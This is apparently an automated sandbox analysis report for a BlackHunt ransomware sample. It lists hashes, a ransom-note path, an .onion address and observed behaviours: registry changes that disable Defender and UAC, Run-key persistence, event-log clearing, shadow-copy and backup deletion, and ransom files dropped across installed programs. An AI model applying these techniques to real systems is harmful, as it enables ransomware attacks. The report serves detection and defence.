Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
26/12/2022, 10:59
Static task
static1
Behavioral task
behavioral1
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Resource
win10v2004-20220901-en
General
-
Target
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
-
Size
718KB
-
MD5
d7a24de75b761cb98f580dafda4ba885
-
SHA1
86dc51cfc817937f9525b8aa2fa71e918288a44d
-
SHA256
f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f
-
SHA512
c3fd50a296b4d251a614816756eb17632779c0ef0e72826d9d276ccae8b1689ca0523a22027509ce20bf125f858f713b08967ae55501c457bc9d8fca956b0e9e
-
SSDEEP
12288:YuLRIEFPULfzlsH5HCSSv5zEWptZ/Vlt:YeRIEF6zlsu5AWptRVlt
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1016 fsutil.exe 5108 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3748 wevtutil.exe 1192 wevtutil.exe 4404 wevtutil.exe 3032 wevtutil.exe 2348 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2060 bcdedit.exe 2528 bcdedit.exe 2876 bcdedit.exe 5004 bcdedit.exe -
pid Process 5072 wbadmin.exe 3772 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityService = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\G: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\K: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Q: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\T: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Y: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\B: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\N: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\O: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\J: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\V: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\Z: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\X: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\R: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\U: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\S: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\F: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\H: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\L: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\E: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\I: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened (read-only) \??\P: f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaSansDemiBold.ttf f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Common Files\Services\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Google\CrashReports\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\ui-strings.js f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\#BlackHunt_ReadMe.hta f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#BlackHunt_Private.key f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#BlackHunt_ReadMe.txt f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3732 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 476 vssadmin.exe 4168 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4532 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Black\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Black reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\ reg.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Black\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeBackupPrivilege 3992 vssvc.exe Token: SeRestorePrivilege 3992 vssvc.exe Token: SeAuditPrivilege 3992 vssvc.exe Token: SeBackupPrivilege 4116 wbengine.exe Token: SeRestorePrivilege 4116 wbengine.exe Token: SeSecurityPrivilege 4116 wbengine.exe Token: SeSecurityPrivilege 3748 wevtutil.exe Token: SeBackupPrivilege 3748 wevtutil.exe Token: SeSecurityPrivilege 1192 wevtutil.exe Token: SeBackupPrivilege 1192 wevtutil.exe Token: SeSecurityPrivilege 4404 wevtutil.exe Token: SeBackupPrivilege 4404 wevtutil.exe Token: SeSecurityPrivilege 3032 wevtutil.exe Token: SeBackupPrivilege 3032 wevtutil.exe Token: SeSecurityPrivilege 2348 wevtutil.exe Token: SeBackupPrivilege 2348 wevtutil.exe Token: SeDebugPrivilege 4532 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4848 wrote to memory of 2284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 81 PID 4848 wrote to memory of 2284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 81 PID 4848 wrote to memory of 64 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 83 PID 4848 wrote to memory of 64 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 83 PID 4848 wrote to memory of 1908 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 85 PID 4848 wrote to memory of 1908 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 85 PID 2284 wrote to memory of 3756 2284 cmd.exe 87 PID 2284 wrote to memory of 3756 2284 cmd.exe 87 PID 4848 wrote to memory of 1756 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 88 PID 4848 wrote to memory of 1756 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 88 PID 4848 wrote to memory of 4244 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 90 PID 4848 wrote to memory of 4244 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 90 PID 1908 wrote to memory of 5068 1908 cmd.exe 92 PID 1908 wrote to memory of 5068 1908 cmd.exe 92 PID 4848 wrote to memory of 5084 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 93 PID 4848 wrote to memory of 5084 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 93 PID 64 wrote to memory of 4616 64 cmd.exe 95 PID 64 wrote to memory of 4616 64 cmd.exe 95 PID 4848 wrote to memory of 4460 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 97 PID 4848 wrote to memory of 4460 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 97 PID 4848 wrote to memory of 1284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 99 PID 4848 wrote to memory of 1284 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 99 PID 1756 wrote to memory of 1740 1756 cmd.exe 98 PID 1756 wrote to memory of 1740 1756 cmd.exe 98 PID 4848 wrote to memory of 2944 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 101 PID 4848 wrote to memory of 2944 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 101 PID 4244 wrote to memory of 1840 4244 cmd.exe 102 PID 4244 wrote to memory of 1840 4244 cmd.exe 102 PID 5084 wrote to memory of 4688 5084 cmd.exe 104 PID 5084 wrote to memory of 4688 5084 cmd.exe 104 PID 4848 wrote to memory of 5112 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 103 PID 4848 wrote to memory of 5112 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 103 PID 4848 wrote to memory of 1348 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 107 PID 4848 wrote to memory of 1348 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 107 PID 4460 wrote to memory of 4800 4460 cmd.exe 109 PID 4460 wrote to memory of 4800 4460 cmd.exe 109 PID 2944 wrote to memory of 4148 2944 cmd.exe 110 PID 2944 wrote to memory of 4148 2944 cmd.exe 110 PID 4848 wrote to memory of 536 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 112 PID 4848 wrote to memory of 536 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 112 PID 4848 wrote to memory of 4260 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 116 